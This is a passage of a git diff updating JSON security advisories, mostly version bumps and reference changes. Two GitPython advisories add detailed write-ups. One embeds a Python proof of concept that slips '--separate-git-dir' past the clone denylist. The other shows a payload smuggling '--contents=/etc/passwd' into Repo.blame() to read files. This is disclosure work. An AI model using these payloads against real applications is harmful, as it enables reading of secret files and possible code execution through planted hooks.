`git` against that redirected/colliding directory (common in CI/build systems that reuse or predict working-directory layouts), this can escalate to hook execution, matching the RCE class already accepted for `--template` in `GHSA-9rj7-rf2p-w77r`.\n\n## Preconditions\n- The calling application forwards a caller-influenced value into a `separate_git_dir` kwarg of `Repo.clone_from()`/`Repo.clone()` (or into the `multi_options` list as a raw `--separate-git-dir=...` token) without itself validating/rejecting it, and does not pass `allow_unsafe_options=True` intentionally. This is the identical trust model GitPython's own denylist already defends for `--template`/`--upload-pack`/`--config`/`--bundle-uri` on the very same code path — i.e. this option was clearly meant to be covered by the same guard and was simply omitted.\n- No authentication/role requirement inside GitPython itself; the vulnerable code runs the moment the host application calls the API with the option present.\n\n## Evidence\n- `git/repo/base.py:145-151` — `unsafe_git_init_options` includes `\"--separate-git-dir\"` with the comment \"Redirects the repository metadata to a caller-controlled path\".\n- `git/repo/base.py:153-165` — `unsafe_git_clone_options` (the list actually enforced on `_clone`) does **not** include `\"--separate-git-dir\"`.\n- `git/repo/base.py:1450-1452` — docstring of `clone_from`/`clone` explicitly documents `--separate-git-dir` as one of the options `allow_unsafe_options` is supposed to gate.\n- `git/repo/base.py:1495-1518` — `_clone()` special-cases `separate_git_dir` only to `Git.polish_url()` it (path normalization for URL-like values), then runs it through `Git.check_unsafe_options(options=..., unsafe_options=cls.unsafe_git_clone_options)` — which, per the list above, does not flag it.\n- PoC (`gitpython-001-poc.py`, embedded below) run against this exact checkout confirms the option reaches the real `git clone` subprocess unguarded and creates a full git directory outside the destination path, with `allow_unsafe_options` at its default `False`.\n\n## False-positive check (adversarial re-read)\n- **Is there a value-level check that would still stop this?** No — `check_unsafe_options` only inspects option *names* (via `_canonicalize_option_name`) against the denylist; it performs no filesystem/path validation on `separate_git_dir`'s value, and no other guard in `_clone()` touches this kwarg besides the `Git.polish_url()` normalization (which does not reject arbitrary paths).\n- **Is `--separate-git-dir` perhaps a no-op or safely sandboxed for `clone` specifically (unlike `init`)?** No — confirmed empirically: the option reaches the real `git` binary unmodified and git honors it exactly as documented, writing the full metadata tree to the given path.\n- **Could this be the exact bug already covered by one of the 26 published GHSAs?** Checked all 26 entries in `_known-advisories.json` (Filter 0): `GHSA-9rj7-rf2p-w77r` covers `--template` in `Repo.init`; `GHSA-6p8h-3wgx-97gf` covers `--template` in clone (already fixed, present in `unsafe_git_clone_options`); `GHSA-hmq2-w58f-27jc` covers arbitrary repo creation via unvalidated **`.gitmodules` submodule names** (a different code path — `Submodule`, not `Repo.clone_from()` kwargs). None reference `--separate-git-dir` on the clone path. This is a distinct, currently-unpatched gap.\n- **Does this require an unrealistic precondition?** The precondition (host app forwards a kwarg into `clone_from`/`clone`) is identical to the precondition already accepted by the maintainers for the sibling entries in the same list (`--template`, `--upload-pack`, `--config`, `--bundle-uri`) — i.e. it is the same threat model the guard exists to cover, just missing one entry.\n- Verdict: no concrete blocker found. **CONFIRMED.**\n\n## Remediation\nAdd `\"--separate-git-dir\"` (and its `-` alias if git ever adds one — currently there is none) to `Repo.unsafe_git_clone_options` in `git/repo/base.py`, matching `unsafe_git_init_options`. Since `Repo._clone()` already special-cases `separate_git_dir` for `Git.polish_url()` normalization, the fix is a one-line addition to the existing list, consistent with how `GHSA-6p8h-3wgx-97gf` added `--template` to the same list.\n\n## Confidence\nHigh. Root cause is a one-line, unambiguous omission the maintainers' own docstring contradicts; PoC reproduces cleanly and deterministically against the current HEAD; no plausible false-positive path found.\n\n\n## Proof-of-Concept source (`gitpython-001-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-001 PoC: Repo.clone_from(separate_git_dir=...) is not in\nunsafe_git_clone_options, so it reaches `git clone` unguarded and writes a\nfull git directory (config, hooks/, objects/, refs/, ...) to an\nattacker-controlled path OUTSIDE the intended destination directory, with\nallow_unsafe_options left at its default of False.\n\nRun against the GitPython source tree under test, e.g.:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-001-poc.py \n\nBenign: only writes/reads inside the given workdir. No destructive/exfiltrating\npayload. Exits non-zero and prints \"NOT VULNERABLE\" if the guard blocks the option\nor the write does not escape the destination directory.\n\"\"\"\nimport os\nimport sys\nimport subprocess\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-001-poc\"\n src = os.path.join(workdir, \"src\")\n dest = os.path.join(workdir, \"dest\")\n sentinel_dir = os.path.join(workdir, \"OUTSIDE_SENTINEL\")\n target_gitdir = os.path.join(sentinel_dir, \"redirected.git\")\n\n for p in (src, dest, sentinel_dir):\n os.makedirs(p, exist_ok=True)\n\n # Minimal benign source repo to clone from.\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", src], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.name\", \"Test\"], check=True)\n with open(os.path.join(src, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n subprocess.run([\"git\", \"-C\", src, \"add\", \"file.txt\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n\n print(\"unsafe_git_clone_options =\", git.Repo.unsafe_git_clone_options)\n assert \"--separate-git-dir\" not in git.Repo.unsafe_git_clone_options, (\n \"guard now includes --separate-git-dir; PoC no longer applicable, target patched\"\n )\n\n try:\n repo = git.Repo.clone_from(src, dest, separate_git_dir=target_gitdir)\n except git.exc.UnsafeOptionError as e:\n print(\"NOT VULNERABLE: blocked by UnsafeOptionError:\", e)\n sys.exit(1)\n\n wrote_outside = os.path.isdir(os.path.join(target_gitdir, \"hooks\")) and os.path.isfile(\n os.path.join(target_gitdir, \"config\")\n )\n gitlink_points_outside = False\n with open(os.path.join(dest, \".git\")) as f:\n gitlink = f.read().strip()\n gitlink_points_outside = target_gitdir in gitlink\n\n print(\"repo.git_dir =\", repo.git_dir)\n print(\"wrote git directory outside dest (sentinel) =\", wrote_outside)\n print(\"dest/.git gitlink points outside dest =\", gitlink_points_outside)\n\n if wrote_outside and gitlink_points_outside:\n print(\"VULNERABLE: git directory created at attacker-controlled path \"\n f\"outside the clone destination: {target_gitdir}\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: sentinel not observed\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78677" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2210" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/b68afff45af0f49e79a3e2d2162018986b37ad5d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3787.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-78678.json b/advisories/BREW-fdroidserver-CVE-2026-78678.json index e86b15e902..3e8e28a3c8 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-78678.json +++ b/advisories/BREW-fdroidserver-CVE-2026-78678.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-78678", "published": "2026-09-04T08:59:24Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "PYSEC-2026-3788", "CVE-2026-78678", @@ -52,21 +52,34 @@ } ] }, - "details": "GitPython versions before 3.1.59 contain an incomplete denylist in the unsafe_git_revision_options guard that omits --contents and -S options, allowing attackers to read arbitrary files by passing these options to Repo.blame(). Attackers can supply revision values like --contents=/etc/passwd to leak file contents through the blame result returned to the caller.", + "summary": "GitPython: Incomplete unsafe_git_revision_options denylist omits --contents/-S, enabling arbitrary file read via Repo.blame()", + "details": "## Summary\n`Repo.blame()` / `Repo.blame_incremental()` guard forwarded revision options against `unsafe_git_revision_options`, but that denylist only contains the file-WRITE options `--output`/`-o`. `git blame` also honors `--contents ` and `-S `, which cause the file's lines to be echoed into the blame result — an arbitrary file READ. Neither option is in the denylist, so a caller-influenced revision value of `--contents=` passes the guard and leaks file contents. This is a distinct sink-option and impact class (READ) from GHSA-956x-8gvw-wg5v (which addressed the blame `--output` WRITE), directly analogous to GHSA-539m-9xh6-q6rr (archive READ gap accepted separately from the archive write/exec advisory).\n\n## Root Cause\n`unsafe_git_revision_options = [\"--output\",\"-o\"]` (`git/repo/base.py:188`). The `rev` string is passed to `_option_candidates([rev], kwargs)` and placed BEFORE the `--` separator (base.py:841). The canonical name of `--contents=...` is `contents`, which is not on the denylist, so no `UnsafeOptionError` is raised. The trailing `--` protects only the pathspec, not the option before the revision.\n\n## Impact\nArbitrary local file read at the privileges of the host process; the file's line contents appear in the blame result returned to the caller. Pure VALUE control (the caller forwards a user-influenced revision string). Default `allow_unsafe_options=False`.\n\n## Proof of Concept\n```python\nresult = repo.blame(\"--contents=/etc/passwd\", \"a.txt\")\n# result rows carry the victim file's line text\n```\n\n## Attack Chain\n1. Entry: app calls `repo.blame(rev, file)` with attacker `rev=\"--contents=/etc/passwd\"` (or kwarg `contents=\"/etc/passwd\"`, or `-S`).\n2. Check: `Git.check_unsafe_options(_option_candidates([rev,...], kwargs), unsafe_git_revision_options)` @ base.py:841. Guard: denylist = `[\"--output\",\"-o\"]` only. Bypass proof: canonical name `contents` ∉ denylist → no error.\n3. Sink: `self.git.blame(rev, \"--\", file, p=True, ...)`. argv (observed): `['git','blame','-p','--contents=','HEAD','--','a.txt']`.\n4. Impact: blame result rows carry the victim file's line text.\n\n## Bypass Evidence\nIndependently reproduced (independent test harness, default `allow_unsafe_options=False`): `blame('--contents=','a.txt')` → guard PASSED; result rows = `['GATE_SECRET_LINE_A','GATE_SECRET_LINE_B']`. Control: `blame('--output=…')` still BLOCKED (guard active on this path). `-S` kwarg argv also reaches git unguarded.\n\n## Affected Versions\n`GitPython <= 3.1.58` (denylist present verbatim on the latest release tag).\n\n## Suggested Fix\nPrefer an allowlist of blame options; at minimum add `--contents`/`-S` (and any other path-taking blame options) to `unsafe_git_revision_options`, and make the membership rule \"the option takes a filesystem path\" rather than \"the option writes output\".\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", "severity": [ { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78678" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3788.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" } ] } diff --git a/advisories/BREW-git-annex-CVE-2014-6274.json b/advisories/BREW-git-annex-CVE-2014-6274.json index cd2de48bf7..73d3a2f153 100644 --- a/advisories/BREW-git-annex-CVE-2014-6274.json +++ b/advisories/BREW-git-annex-CVE-2014-6274.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-git-annex-CVE-2014-6274", "published": "2026-08-13T16:50:35Z", - "modified": "2026-08-13T16:50:35Z", + "modified": "2026-09-10T19:17:39Z", "upstream": [ "HSEC-2023-0013", "CVE-2014-6274" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "pkg:hackage/git-annex@10.20260901" }, { "strategy": "distro", @@ -56,8 +56,8 @@ "strategy": "distro", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "upstream:pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "upstream:pkg:hackage/git-annex@10.20260901" } ] }, diff --git a/advisories/BREW-git-annex-CVE-2017-12976.json b/advisories/BREW-git-annex-CVE-2017-12976.json index 20f4ec7d70..17a11eb49b 100644 --- a/advisories/BREW-git-annex-CVE-2017-12976.json +++ b/advisories/BREW-git-annex-CVE-2017-12976.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-git-annex-CVE-2017-12976", "published": "2026-08-13T16:50:35Z", - "modified": "2026-08-13T16:50:35Z", + "modified": "2026-09-10T19:17:39Z", "upstream": [ "HSEC-2023-0009", "CVE-2017-12976" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "pkg:hackage/git-annex@10.20260901" }, { "strategy": "distro", @@ -56,8 +56,8 @@ "strategy": "distro", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "upstream:pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "upstream:pkg:hackage/git-annex@10.20260901" }, { "strategy": "distro", diff --git a/advisories/BREW-git-annex-CVE-2018-10857.json b/advisories/BREW-git-annex-CVE-2018-10857.json index 01e2a3b096..cd99dd64f8 100644 --- a/advisories/BREW-git-annex-CVE-2018-10857.json +++ b/advisories/BREW-git-annex-CVE-2018-10857.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-git-annex-CVE-2018-10857", "published": "2026-08-13T16:50:35Z", - "modified": "2026-08-13T16:50:35Z", + "modified": "2026-09-10T19:17:39Z", "upstream": [ "HSEC-2023-0010", "CVE-2018-10857" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "pkg:hackage/git-annex@10.20260901" }, { "strategy": "distro", @@ -56,8 +56,8 @@ "strategy": "distro", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "upstream:pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "upstream:pkg:hackage/git-annex@10.20260901" }, { "strategy": "distro", diff --git a/advisories/BREW-git-annex-CVE-2018-10859.json b/advisories/BREW-git-annex-CVE-2018-10859.json index da9544c9df..1c26974c44 100644 --- a/advisories/BREW-git-annex-CVE-2018-10859.json +++ b/advisories/BREW-git-annex-CVE-2018-10859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-git-annex-CVE-2018-10859", "published": "2026-08-13T16:50:35Z", - "modified": "2026-08-13T16:50:35Z", + "modified": "2026-09-10T19:17:39Z", "upstream": [ "HSEC-2023-0011", "CVE-2018-10859" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "pkg:hackage/git-annex@10.20260901" }, { "strategy": "distro", @@ -56,8 +56,8 @@ "strategy": "distro", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "upstream:pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "upstream:pkg:hackage/git-annex@10.20260901" }, { "strategy": "distro", diff --git a/advisories/BREW-git-annex-HSEC-2023-0012.json b/advisories/BREW-git-annex-HSEC-2023-0012.json index c59bf35b8a..58f6e2804a 100644 --- a/advisories/BREW-git-annex-HSEC-2023-0012.json +++ b/advisories/BREW-git-annex-HSEC-2023-0012.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-git-annex-HSEC-2023-0012", "published": "2026-08-13T16:50:35Z", - "modified": "2026-08-13T16:50:35Z", + "modified": "2026-09-10T19:17:39Z", "upstream": [ "HSEC-2023-0012" ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "Hackage", "name": "git-annex", - "subject_version": "10.20260717", - "key": "pkg:hackage/git-annex@10.20260717" + "subject_version": "10.20260901", + "key": "pkg:hackage/git-annex@10.20260901" } ] }, diff --git a/advisories/BREW-hf-CVE-2016-10075.json b/advisories/BREW-hf-CVE-2016-10075.json index 755d660ced..cda41a9d98 100644 --- a/advisories/BREW-hf-CVE-2016-10075.json +++ b/advisories/BREW-hf-CVE-2016-10075.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2016-10075", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-r7q7-xcjw-qx8q", "CVE-2016-10075", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tqdm", - "subject_version": "4.70.0", - "key": "pkg:pypi/tqdm@4.70.0", - "resource": "tqdm" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2017-18342.json b/advisories/BREW-hf-CVE-2017-18342.json index 02e2780b7c..d609061773 100644 --- a/advisories/BREW-hf-CVE-2017-18342.json +++ b/advisories/BREW-hf-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2017-18342", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2019-20477.json b/advisories/BREW-hf-CVE-2019-20477.json index 543768ff0a..484884d414 100644 --- a/advisories/BREW-hf-CVE-2019-20477.json +++ b/advisories/BREW-hf-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2019-20477", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2020-14343.json b/advisories/BREW-hf-CVE-2020-14343.json index 11fcb383ac..d7a04bb5a6 100644 --- a/advisories/BREW-hf-CVE-2020-14343.json +++ b/advisories/BREW-hf-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2020-14343", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2020-1747.json b/advisories/BREW-hf-CVE-2020-1747.json index d8d90b8395..bb06714273 100644 --- a/advisories/BREW-hf-CVE-2020-1747.json +++ b/advisories/BREW-hf-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2020-1747", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2021-41945.json b/advisories/BREW-hf-CVE-2021-41945.json index 773faa6bc3..534d2272d9 100644 --- a/advisories/BREW-hf-CVE-2021-41945.json +++ b/advisories/BREW-hf-CVE-2021-41945.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2021-41945", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-h8pj-cxx2-jfg2", "CVE-2021-41945", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httpx", - "subject_version": "0.28.1", - "key": "pkg:pypi/httpx@0.28.1", - "resource": "httpx" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2024-34062.json b/advisories/BREW-hf-CVE-2024-34062.json index b03f61aacd..fdd6311e6d 100644 --- a/advisories/BREW-hf-CVE-2024-34062.json +++ b/advisories/BREW-hf-CVE-2024-34062.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2024-34062", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-g7vv-2v7x-gj9p", "CVE-2024-34062", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tqdm", - "subject_version": "4.70.0", - "key": "pkg:pypi/tqdm@4.70.0", - "resource": "tqdm" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2024-3651.json b/advisories/BREW-hf-CVE-2024-3651.json index 6297d81fb1..80abb35740 100644 --- a/advisories/BREW-hf-CVE-2024-3651.json +++ b/advisories/BREW-hf-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2024-3651", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-20T09:00:33Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2025-43859.json b/advisories/BREW-hf-CVE-2025-43859.json index 6998f3f65a..b686f61611 100644 --- a/advisories/BREW-hf-CVE-2025-43859.json +++ b/advisories/BREW-hf-CVE-2025-43859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2025-43859", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-vqfr-h8mv-ghfj", "CVE-2025-43859", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "h11", - "subject_version": "0.16.0", - "key": "pkg:pypi/h11@0.16.0", - "resource": "h11" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2025-68146.json b/advisories/BREW-hf-CVE-2025-68146.json index edccb4583f..17049de106 100644 --- a/advisories/BREW-hf-CVE-2025-68146.json +++ b/advisories/BREW-hf-CVE-2025-68146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2025-68146", "published": "2026-08-13T16:56:26Z", - "modified": "2026-09-05T09:04:43Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-w853-jp5j-5j7f", "CVE-2025-68146", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.32.5", - "key": "pkg:pypi/filelock@3.32.5", - "resource": "filelock" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2026-22701.json b/advisories/BREW-hf-CVE-2026-22701.json index 5a01c2715d..b0622f2cb3 100644 --- a/advisories/BREW-hf-CVE-2026-22701.json +++ b/advisories/BREW-hf-CVE-2026-22701.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2026-22701", "published": "2026-08-13T16:56:26Z", - "modified": "2026-09-05T09:04:43Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-qmgc-5h2g-mvrw", "CVE-2026-22701", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.32.5", - "key": "pkg:pypi/filelock@3.32.5", - "resource": "filelock" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hf-CVE-2026-45409.json b/advisories/BREW-hf-CVE-2026-45409.json index 9b7b964e32..6f8ad88826 100644 --- a/advisories/BREW-hf-CVE-2026-45409.json +++ b/advisories/BREW-hf-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hf-CVE-2026-45409", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-20T09:00:33Z", + "modified": "2026-09-10T19:27:17Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2014-1829.json b/advisories/BREW-pulp-cli-CVE-2014-1829.json index 41bbfaa5da..9b40bd6832 100644 --- a/advisories/BREW-pulp-cli-CVE-2014-1829.json +++ b/advisories/BREW-pulp-cli-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2014-1829", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2014-1830.json b/advisories/BREW-pulp-cli-CVE-2014-1830.json index c4e91d8cd9..f447647954 100644 --- a/advisories/BREW-pulp-cli-CVE-2014-1830.json +++ b/advisories/BREW-pulp-cli-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2014-1830", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - 